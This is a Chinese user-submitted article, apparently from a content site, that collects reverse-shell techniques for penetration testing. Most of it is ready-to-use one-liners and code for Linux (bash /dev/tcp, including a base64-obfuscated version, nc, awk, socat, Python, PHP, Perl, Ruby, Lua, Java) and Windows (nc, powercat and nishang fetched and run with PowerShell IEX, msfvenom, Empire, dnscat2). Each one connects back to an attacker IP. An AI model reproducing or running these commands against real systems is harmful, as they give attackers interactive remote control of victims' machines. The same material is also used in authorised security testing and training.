1. 久久派首页
  2. 用户投稿

反弹shell的几种姿势小结

nan 用户投稿

在渗透过程中,往往因为端口限制而无法直连目标机器,此时需要通过反弹shell来获取一个交互式shell,以便继续深入,本文就介绍了几种方法,感兴趣的可以了解一下

反弹shell的几种姿势小结,久久派带你了解更多相关信息。

目录
  • Linux 反弹shell
  • Windows反弹shell

在渗透过程中,往往因为端口限制而无法直连目标机器,此时需要通过反弹shell来获取一个交互式shell,以便继续深入。

反弹shell是打开内网通道的第一步,也是权限提升过程中至关重要的一步。所有姿势整理自网络,假设,攻击者主机为:192.168.99.242,本地监听1234端口,如有特殊情况以下会备注说明。

Linux 反弹shell

姿势一:bash反弹

bash -i >& /dev/tcp/192.168.99.242/1234 0>&1base64版:bash -c \'{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljk5LjI0Mi8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}\'

在线编码地址:http://www.jackson-t.ca/runtime-exec-payloads.html

其他版本:

exec 5<>/dev/tcp/192.168.99.242/1234;cat <&5 | while read line; do $line 2>&5 >&5;doneexec /bin/sh 0</dev/tcp/192.168.99.242/1234 1>&0 2>&0

姿势二:nc反弹

nc -e /bin/bash 192.168.99.242 1234

姿势三:awk反弹

awk \'BEGIN{s=\"/inet/tcp/0/192.168.99.242/1234\";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}\'

姿势四:telnet反弹

备注:需要在攻击主机上分别监听1234和4321端口,执行反弹shell命令后,在1234终端输入命令,4321查看命令执行后的结果。

telnet 192.168.99.242 1234 | /bin/bash | telnet 192.168.99.242 4321

姿势五:socat反弹

socat exec:\'bash -li\',pty,stderr,setsid,sigint,sane tcp:192.168.99.242:1234

姿势六:Python反弹

python -c \"import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\'192.168.99.242\',1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\'/bin/bash\',\'-i\']);\"

姿势七:PHP反弹

php -r \'$sock=fsockopen(\"192.168.99.242\",1234);exec(\"/bin/sh -i <&3 >&3 2>&3\");\'

姿势八:Perl反弹

perl -e \'use Socket;$i=\"192.168.99.242\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};\'

姿势九:Ruby反弹

ruby -rsocket -e\'f=TCPSocket.open(\"192.168.99.242\",1234).to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)\'

姿势十:Lua反弹

lua -e \"require(\'socket\');require(\'os\');t=socket.tcp();t:connect(\'192.168.99.242\',\'1234\');os.execute(\'/bin/sh -i <&3 >&3 2>&3\');\"

姿势十一:JAVA反弹

public class Revs {    /**    * @param args    * @throws Exception     */public static void main(String[] args) throws Exception {        // TODO Auto-generated method stub        Runtime r = Runtime.getRuntime();        String cmd[]= {\"/bin/bash\",\"-c\",\"exec 5<>/dev/tcp/192.168.99.242/1234;cat <&5 | while read line; do $line 2>&5 >&5; done\"};        Process p = r.exec(cmd);        p.waitFor();    }}

保存为Revs.java文件,编译执行,成功反弹shell。

javac Revs.java java Revs

Windows反弹shell

姿势一:nc反弹

netcat 下载:https://eternallybored.org/misc/netcat/

服务端反弹:nc 192.168.99.242 1234 -e c:\\windows\\system32\\cmd.exe

姿势二:powershell反弹

powercat是netcat的powershell版本,功能免杀性都要比netcat好用的多。

PS C:\\WWW>powershell IEX (New-Object System.Net.Webclient).DownloadString(\'https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1\'); powercat -c 192.168.99.242 -p 1234 -e cmd

下载到目标机器本地执行:

PS C:\\WWW> Import-Module ./powercat.ps1PS C:\\WWW> powercat -c 192.168.99.242 -p 1234 -e cmd

姿势三:MSF反弹shell

使用msfvenom生成相关Payload

msfvenom -l payloads | grep \'cmd/windows/reverse\'msfvenom -p cmd/windows/reverse_powershell LHOST=192.168.99.242 LPORT=1234

姿势四:Cobalt strike反弹shell

1、配置监听器:点击Cobalt Strike——>Listeners——>在下方Tab菜单Listeners,点击add。
2、生成payload:点击Attacks——>Packages——>Windows Executable,保存文件位置。
3、目标机执行powershell payload

姿势五:Empire反弹shell

usestager windows/launcher_vbsinfoset Listener testexecute

姿势六:nishang反弹shell

Reverse TCP shell:

powershell IEX (New-Object Net.WebClient).DownloadString(\'https://raw.githubusercontent.com /samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1\'); Invoke-PowerShellTcp -Reverse -IPAddress 10.1.1.210 -port 1234

Reverse UDP shell:

powershell IEX (New-Object Net.WebClient).DownloadString(\'https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellUdp.ps1\');Invoke-PowerShellUdp -Reverse -IPAddress 10.1.1.210 -port 1234

姿势七:Dnscat反弹shell

github项目地址:

https://github.com/iagox86/dnscat2

服务端:

ruby dnscat2.rb --dns \"domain=lltest.com,host=xx.xx.xx.xx\" --no-cache -e open -e open

目标主机:

powershell IEX (New-Object System.Net.Webclient).DownloadString(\'https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/master/dnscat2.ps1\');Start-Dnscat2 -Domain lltest.com -DNSServer xx.xx.xx.xx

到此这篇关于反弹shell的几种姿势小结的文章就介绍到这了,更多相关反弹shell内容请搜索趣讯吧以前的文章或继续浏览下面的相关文章希望大家以后多多支持趣讯吧!

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,请发送邮件至 55@qq.com 举报,一经查实,本站将立刻删除。转转请注明出处:https://www.szhjjp.com/n/8634.html

(0)
nan
0
上一篇 2021-07-30
下一篇 2021-07-30

相关推荐

  • 创业板上市公司规范运作指引,创业板股票职工股多久可交易 用户投稿

    创业板上市公司规范运作指引,创业板股票职工股多久可交易

    IPO上市前股东所持股份的锁定期和减持限制详解一创业板上市公司规范运作指引、IPO前股东所持股份的锁定期为了避免大股东和主要管理人员的变动而给新上市的公司带来经营的不确定性和业务的不稳定性,以及为了避免IPO前持股股东大比例减持股份而给新上市公司的股

    2022-01-16
    0
  • 特产品,怎样才能把农产品、土特产展销出去 用户投稿

    特产品,怎样才能把农产品、土特产展销出去

    加大推介宣传,树立品牌,保证品质特产品。品质是品牌的核心,也是市场竞争力的关键。品牌除决定于内在品质外,也取决于公众的认知度和社会影响力。因此要主动参与展销会等大众平台,积极宣传推介产品。利用微信、互联网+等现代信息,实现线上线下融合发展。养殖企业

    2022-01-16
    0

  • 大豆产品有哪些(大豆有哪些)

    豆制品是我们在日常生活中,最为常见的高蛋白食物,它是以大豆为主要原材料制作而成的食物。大豆,就是我们常说的黄豆,它是中国重要的粮食作物之一,也是我们在减脂期,会经常吃到的一种理想的优质植物蛋白质食物,因其营养价值很高,也被称为“田中之肉”。大豆的营养…

    2022-01-18 随笔
    0

  • 网友疯买(雷军力撑!又一家国货站起来了)

    近期以来,不少国货品牌纷纷为河南捐款捐物慷慨解囊,还一度引起了网友们的&ldquo;野性消费&rdquo;,而贵人鸟就在其中。尽管已经连续三年亏损,但在面对河南灾情的时候,贵人鸟也和鸿星尔克一

    2021-07-30 用户投稿
    0
  • 关于资金盘是什么意思相关内容(资金盘是什么意思) 用户投稿

    关于资金盘是什么意思相关内容(资金盘是什么意思)

    资金盘很少能活过三年,最终不是崩盘就是跑路。这句话并不是卡神小组说的夸张,而是事实是这样,资金盘玩的就是接盘侠和跑得快的游戏。卡神小组提醒朋友们,除了少数自以为聪明的人明知道是资金盘还是抱着自己不是接盘侠的投机心理参与进去,大多数人是辨识不了资金盘,

    2022-01-06
    0
  • 小米1999元红包如何领(小米手机十周年1999红包领取方法) 用户投稿

    小米1999元红包如何领(小米手机十周年1999红包领取方法)

    小米1999红包是十周年的回馈活动,想要获得这个1999红包应该怎么做?首先要了解1999红包的领取方法,小编会把1999红包领取活动的玩法规则分享在下面,希望对大家有所帮助

    2021-08-11
    0

发表回复

登录后才能评论